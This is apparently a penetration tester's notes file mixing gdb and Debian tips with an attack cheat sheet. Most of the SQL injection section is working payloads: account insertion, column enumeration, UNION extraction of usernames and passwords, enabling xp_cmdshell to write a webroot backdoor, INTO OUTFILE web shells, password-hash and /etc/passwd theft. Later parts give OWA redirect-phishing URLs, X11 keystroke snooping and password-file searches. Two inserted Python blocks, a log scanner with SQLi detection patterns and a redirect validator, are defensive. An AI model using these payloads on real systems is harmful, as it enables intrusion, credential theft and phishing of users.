Debugging

by filename from scratch:
$ sudo gdb /usr/sbin/programname

on already-running process:
$ sudo gdb /usr/sbin/programname 4860

self-explanatory:
(gdb) run
(gdb) generate-core-file
(gdb) detach

print stack (equivalent to 'backtrace' or 'bt' command):
(gdb) where

print lines of source code:
(gdb) list

register values:
(gdb) info reg

Hint: install relevant debug symbols package

useful links:
http://dirac.org/linux/gdb/01-Introduction.php
https://wiki.ubuntu.com/DebuggingProgramCrash
http://www.digilife.be/quickreferences/QRC/GDB%20Quick%20Reference.pdf

SQLi (mainly MSSQL and MySQL)

add flag as PoC:
CREATE TABLE pentester(was char(5),here char(5))

Verify by getting no errors (if vuln is error-based SQLi) when submitting a well-constructed query. i.e.:
http://target.foo/vuln.asp?id=1;SELECT * FROM pentester--

if the table was NOT created successfully, then you should get an error like:
Invalid object name "pentester"

add new account even if single and/or double quotation marks are filtered. Integers are converted to strings, so in this case the added username and password would be "666" (without quotation marks):
INSERT INTO users (user_id, username, password) VALUES (666,666,666)--
i.e.:
http://target.foo/vuln.asp?id=1;INSERT%20INTO%20users%20(user_id,%20username,%20password)%20VALUES%20(666,666,666)--

Traverse to table other than current one, and enumerate column names:
http://target.foo/vuln.asp?id=1;select%20*%20from%20users%20having%201=1--
Returns:
users.USER_ID

http://target.foo/vuln.asp?id=1;select%20*%20from%20users%20group%20by%20user_id%20having%201=1--
Returns:
users.USERNAME

http://target.foo/vuln.asp?id=1;select%20*%20from%20users%20group%20by%20user_id,username%20having%201=1--
Returns:
users.PASSWORD

And so on until no more similar SQL errors are returned
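Detection-side counterpart to the payload shapes in these SQLi notes (the HAVING 1=1 column enumeration above, plus the UNION SELECT, WAITFOR DELAY, xp_cmdshell, load_file and INTO OUTFILE forms used further on): an added example, not part of the original notes, that URL-decodes the request path from common-format web server log lines (constructed here) and flags the ones carrying those patterns.

```python
import re
from urllib.parse import unquote_plus

# Signatures modelled on the payload shapes in these notes (HAVING 1=1 column
# enumeration, UNION SELECT, WAITFOR DELAY, xp_cmdshell, load_file, INTO OUTFILE).
SIGNATURES = {
    "stacked_query": re.compile(r";\s*(select|insert|update|create|exec)\b", re.I),
    "having_enum":   re.compile(r"\bhaving\s+1\s*=\s*1\b", re.I),
    "union_select":  re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "time_delay":    re.compile(r"\bwaitfor\s+delay\b", re.I),
    "cmdshell":      re.compile(r"\bxp_cmdshell\b", re.I),
    "file_read":     re.compile(r"\bload_file\s*\(", re.I),
    "file_write":    re.compile(r"\binto\s+outfile\b", re.I),
    "bool_probe":    re.compile(r"\band\s+1\s*=\s*[01]\b", re.I),
}

# Common log format: ip ident user [time] "METHOD path PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<path>\S+) \S+" (?P<status>\d{3})')

def decode_query(raw, rounds=3):
    """URL-decode repeatedly so double-encoded payloads (%2527 -> %27 -> ') are seen."""
    cur = raw
    for _ in range(rounds):
        nxt = unquote_plus(cur)
        if nxt == cur:
            break
        cur = nxt
    return cur

def scan_line(line):
    """Return a hit record for one access-log line, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    decoded = decode_query(m.group("path"))
    hits = [name for name, rx in SIGNATURES.items() if rx.search(decoded)]
    if not hits:
        return None
    return {"ip": m.group("ip"), "status": m.group("status"),
            "path": decoded, "signatures": hits}

def scan_log(text):
    return [hit for hit in map(scan_line, text.splitlines()) if hit]

# Constructed sample log lines; the first three carry payloads from these notes.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2009:13:55:36 +0000] "GET /vuln.asp?id=1;select%20*%20from%20users%20having%201=1-- HTTP/1.1" 500 512
10.0.0.5 - - [10/Oct/2009:13:55:40 +0000] "GET /vuln.asp?id=1%27);waitfor%20delay%20%270:0:10%27-- HTTP/1.1" 200 1024
10.0.0.9 - - [10/Oct/2009:13:56:01 +0000] "GET /vuln.php?id=1+union+select+concat(username,0x3a,password),2,3+from+users-- HTTP/1.1" 200 2048
192.168.1.7 - - [10/Oct/2009:13:57:12 +0000] "GET /index.php?page=about HTTP/1.1" 200 3072
"""
```

Running scan_log(SAMPLE_LOG) returns three hit records; a 500 status next to a stacked or HAVING probe is the error-based signal the notes above rely on, so it is worth alerting on separately.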
Get actual records. Note: SELECTed integers are dummy values to match the number of queried columns from the pre-UNION+SELECT statement:
http://target.foo/vuln.php?id=1+union+select+concat(username,0x3a,password),2,3,4,5,6,7+from+users--
Note: SQL server does not support the concat() function. Use the plus '+' operator instead.

Enable xp_cmdshell. Will only work if you have sa/dbo rights. Useful for SQL 2005 server:
EXEC master.dbo.sp_configure "show advanced options", 1

Then write your backdoor shell code on webroot. i.e.:
EXEC master..xp_cmdshell "echo EVIL_CODE_HERE>d:\inetpub\wwwroot"

Save arbitrary content on filesystem (useful to achieve remote command execution on MySQL servers):
SELECT "evil content" INTO OUTFILE "/path/to/backdoor.php";

Get user:
or 1=convert(int,(USER))--

Get sa hash on MS SQL 2005:
SELECT password_hash FROM sys.sql_logins where name='sa'

Get file contents ('/etc/passwd' in this case):
SELECT load_file('/etc/passwd');

Use double quotes if single quotes are filtered:
SELECT load_file("/etc/passwd");

If both single and double quotes are filtered, then hex-encode filename. Note: you can use CAL9000 "straight" hex encoder to retrieve other filenames (don't forget to prepend hex string with '0x'):
SELECT load_file(0x2F6574632F706173737764);

Examples of interesting payloads (useful for blind SQLi):
UPDATE users SET password="1234" WHERE id=1;

If target table is not on current database, then specify database name the target table belongs to:
UPDATE dbname.users SET password="1234" WHERE id=1;

Blind SQLi delay test:
waitfor delay '0:0:10';

Don't forget to test variations which depend on where the payload is injected in the original SQL statement. i.e.:
http://target.foo/vuln.asp?id=1%27);waitfor%20delay%20%270:0:10%27--

Blind SQLi boolean test:
AND 1=1
versus:
AND 1=0
i.e.:
http://target.foo/vuln.asp?id=1+AND+1=1
Compare responses. i.e.: different content length, different errors in HTTP headers, etc.

Location of MySQL user hashes: table 'user' within 'mysql' database. i.e.:
SELECT Host,User,Password FROM mysql.user;

Location of *all* MySQL database names and table names: table 'TABLES' within the 'information_schema' database. i.e.:
SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES;

Useful resources:
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://michaeldaw.org/sql-injection-cheat-sheet/
http://pentestmonkey.net/index.php?option=com_content&task=category&sectionid=9&id=24&Itemid=1
http://www.toorcon.org/tcx/9_McCray.pdf
http://www.ngssoftware.com/papers/advanced_sql_injection.pdf

Command-line tools:
http://sqlmap.sourceforge.net/
http://sqlsus.sourceforge.net/

Debian/Ubuntu/GNU Linux
Search for package names based on keywords:
$ sudo apt-cache search "Text-to-search"
i.e.:
$ sudo apt-cache search "mysql"

Example of network settings:
$ cat /etc/network/interfaces

Finding world-writable files and directories
# find / -type f \( -perm -2 -o -perm -20 \) -exec ls -lg {} \; 2>/dev/null >writable.txt

Finding setuid files
# find / -type f \( -perm -004000 -o -perm -002000 \) -exec ls -lg {} \; 2>/dev/null >suidfiles.txt

References:
http://www.gentoo.org/doc/en/security/security-handbook.xml?part=1&chap=6

Change DNS server settings permanently so they are not overwritten via DHCP:
- edit /etc/dhcp3/dhclient.conf
- uncomment supersede statement with desired settings. i.e.:
  supersede domain-name-servers 208.67.222.222,208.67.220.220;
- restart networking. i.e.:
  sudo /etc/init.d/networking restart

Outlook Web Access (OWA) 2003
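The cross-domain redirect in the OWA notes that follow (owalogon.asp?url=http://webmail.target.foo.fake.com/ is accepted because the lookalike host begins with the real hostname) is the kind of weak target check this added example contrasts with a strict one. It is not part of the original notes and assumes webmail.target.foo as the trusted host; naive_is_local and safe_redirect_target are hypothetical names.

```python
from urllib.parse import urlparse

# Assumed trusted OWA host; placeholder standing in for the real webmail hostname.
TRUSTED_HOST = "webmail.target.foo"

def naive_is_local(url):
    """The weak check: a lookalike host that merely starts with the real name passes."""
    return url.startswith(("http://" + TRUSTED_HOST, "https://" + TRUSTED_HOST))

def safe_redirect_target(url, trusted_host=TRUSTED_HOST):
    """Return a redirect target that provably stays on trusted_host, or None to refuse it."""
    parsed = urlparse(url)
    if parsed.scheme not in ("", "https"):          # no http downgrade, no javascript:/data:
        return None
    if parsed.netloc == "":
        # Relative target: accept only a plain absolute path. "//host" and "/\host"
        # are scheme-relative in browsers and would leave the site.
        if url.startswith("/") and not url.startswith(("//", "/\\")):
            return url
        return None
    try:
        port = parsed.port                            # raises on junk like ":abc"
    except ValueError:
        return None
    # Exact host comparison (urlparse lowercases hostname); credentials in the
    # authority ("trusted@evil") and odd ports are refused outright.
    if parsed.hostname != trusted_host or parsed.username or port not in (None, 443):
        return None
    target = "https://" + trusted_host + (parsed.path or "/")
    if parsed.query:
        target += "?" + parsed.query
    return target
```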
Exchange admin:
https://webmail.target.foo/exadmin/

Cross-domain redirect (redirect happens after clicking on "Log on", even if credentials are invalid):
https://webmail.target.foo/exchweb/bin/auth/owalogon.asp?url=http://webmail.target.foo.fake.com/

For the following redirect, the credentials must be valid:
https://webmail.target.foo/exchweb/bin/redir.asp?URL=http://webmail.target.foo.fake.com/

VBScript error by assigning a string to the 'reason' parameter (expects a numeric value):
https://webmail.target.foo/exchweb/bin/auth/owalogon.asp?reason=abc

Error returned in HTML:
Microsoft VBScript runtime error '800a000d'
Type mismatch: '[string: "abc"]'
/exchweb/bin/auth/usa/logon.asp, line 542

Error returned in HTTP headers:
500 Internal Server Error

Advanced phishing: will show the fake login page after logging in while still on the legitimate site.
syntax:
https://webmail.target.foo/exchweb/bin/auth/owalogon.asp?url=https://webmail.target.foo/exchange/<victim_username>/Inbox/<email_subject>.EML/1_multipart_xF8FF_2_<html_attachment_filename>
i.e.:
https://webmail.target.foo/exchweb/bin/auth/owalogon.asp?url=https://webmail.target.foo/exchange/pgriffin/Inbox/OWA%20LOGON.EML/1_multipart_xF8FF_2_fake_login.html

More info here:
http://www.gnucitizen.org/blog/owning-outlook-web-access-owa-users/

Infrastructure pentesting

smb

test cracked/found password via SMB:
smbclient \\\\targethost\\ipc$ -U username password

x11
packages required for xkey.c: libxt-dev and probably x11proto-core-dev

if target is misconfigured and allows connections from any hosts. i.e.:
$ xhost +

then we can:
$ export DISPLAY=server-host-name:0.0

remember to try different display numbers:
declare -x DISPLAY="10.10.3.11:1.0"
etc ...
Depends on open ports. i.e.: display 1 on tcp/6000, display 2 on tcp/6001 and so on.

Then have fun with X tools. i.e.: xkey, xtv, etc ...

Compaq Insight Manager - now known as HP System Management

default passwords: anonymous/<none>
default login URL: http://target.foo:2301/cpqlogin.htm

find hosts allowing null sessions in subnet
$ echo -en "\n" > returnchar.txt

Windows tricks/useful commands
find files containing a certain string in their name (case insensitive search):
dir \ /s /b | find /I "password"

find files containing a certain string (case insensitive search):
findstr /i /s "password" \* |